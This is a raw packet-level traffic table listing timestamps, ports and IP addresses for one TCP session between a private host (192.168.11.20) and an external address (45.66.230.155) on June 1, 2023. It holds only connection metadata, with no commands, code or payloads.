Jun 1, 2023 22:36:41.054301023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054311991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054332972 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054343939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054354906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054364920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054375887 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054385900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054475069 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054475069 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054475069 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054492950 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054542065 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054595947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054646015 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054727077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054775953 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054790974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054802895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054821014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054831982 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054847956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054883003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054894924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054902077 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054908991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054933071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054944038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054959059 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054989100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055001974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055044889 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055049896 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055063009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055080891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055093050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055104017 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055150032 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055161953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055172920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055222034 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055241108 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055241108 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055286884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055299044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055422068 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055423021 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055470943 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.055471897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055599928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055654049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055727959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055783987 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055794954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055805922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055834055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055845022 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055856943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055879116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055890083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055902958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055918932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055934906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055946112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055957079 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055968046 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055984974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.055995941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056046009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056057930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056068897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056291103 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056405067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056416988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056478977 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056488037 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056533098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056544065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056555033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056579113 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056590080 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056601048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056611061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056631088 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056642056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056653023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056663990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056679964 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056683064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056700945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056713104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056731939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056742907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056754112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056793928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056806087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056817055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056834936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056845903 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056862116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056862116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056862116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056958914 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056958914 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.056979895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.056992054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057008028 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057123899 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057461023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057585001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057641983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057652950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057663918 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057683945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057694912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057706118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057717085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057719946 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057750940 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057763100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057768106 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057768106 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057790041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057804108 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057815075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057816982 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057840109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057852030 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057862997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057866096 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057881117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057900906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057912111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057914972 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057930946 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057950020 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057961941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.057964087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.057964087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058104992 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058104992 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058140039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058245897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058258057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058276892 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058304071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058315992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058337927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058350086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058361053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058372021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058392048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058394909 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058409929 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058422089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058433056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058443069 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058480024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058485031 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058485031 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058532953 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058542013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058554888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058573961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058582067 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058589935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058603048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058614969 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058629990 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058640957 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058653116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058665037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058687925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058698893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058710098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.058728933 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058728933 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058825970 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058825970 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.058875084 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059140921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059256077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059310913 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059322119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059381962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059392929 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059439898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059447050 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059457064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059473038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059484005 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059542894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059551001 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059559107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059581041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059592962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059597969 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059647083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059695005 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059710026 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059722900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059734106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059751034 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059753895 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059753895 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059768915 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059820890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059833050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059844971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059851885 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059851885 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.059920073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.059947968 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060013056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060085058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060163975 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060175896 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060188055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060206890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060218096 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060220957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060265064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060327053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060339928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060347080 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060367107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060380936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060393095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060415030 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060426950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060439110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060446024 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060456991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060472012 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060492992 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060514927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060565948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060579062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060590029 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060619116 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060668945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060668945 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060766935 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060784101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060796976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060811043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060836077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060847998 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060889959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.060961962 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.060976028 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061017036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061075926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061088085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061100006 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061110973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.061842918 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.302555084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.302706957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.355751991 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.355799913 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.374186993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374248028 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374286890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374325991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374370098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374480963 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374543905 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.374543905 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.374624014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374727964 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.374764919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374912977 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.374932051 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375083923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375140905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375176907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375212908 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375235081 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375264883 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375294924 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375314951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375360012 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375392914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375422001 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375437021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375505924 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375519037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375562906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375571966 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375639915 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375669956 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375678062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375770092 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375838995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375859022 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.375937939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.375983953 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376005888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376086950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376132011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376146078 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376177073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376221895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376266003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376271963 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376329899 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376370907 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376405954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376463890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376470089 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376580954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376595020 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376678944 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376758099 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376799107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376821041 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376842976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376884937 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376910925 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.376928091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.376971006 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377010107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377037048 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377052069 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377095938 CEST	2537	49850	45.66.230.155	192.168.11.20
